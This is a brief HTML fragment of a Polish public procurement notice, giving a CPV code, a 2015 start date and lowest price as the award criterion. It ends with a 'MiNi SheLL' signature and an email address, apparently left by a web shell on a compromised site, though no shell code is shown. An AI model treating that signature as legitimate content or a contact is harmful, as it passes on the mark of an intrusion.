<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.21.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com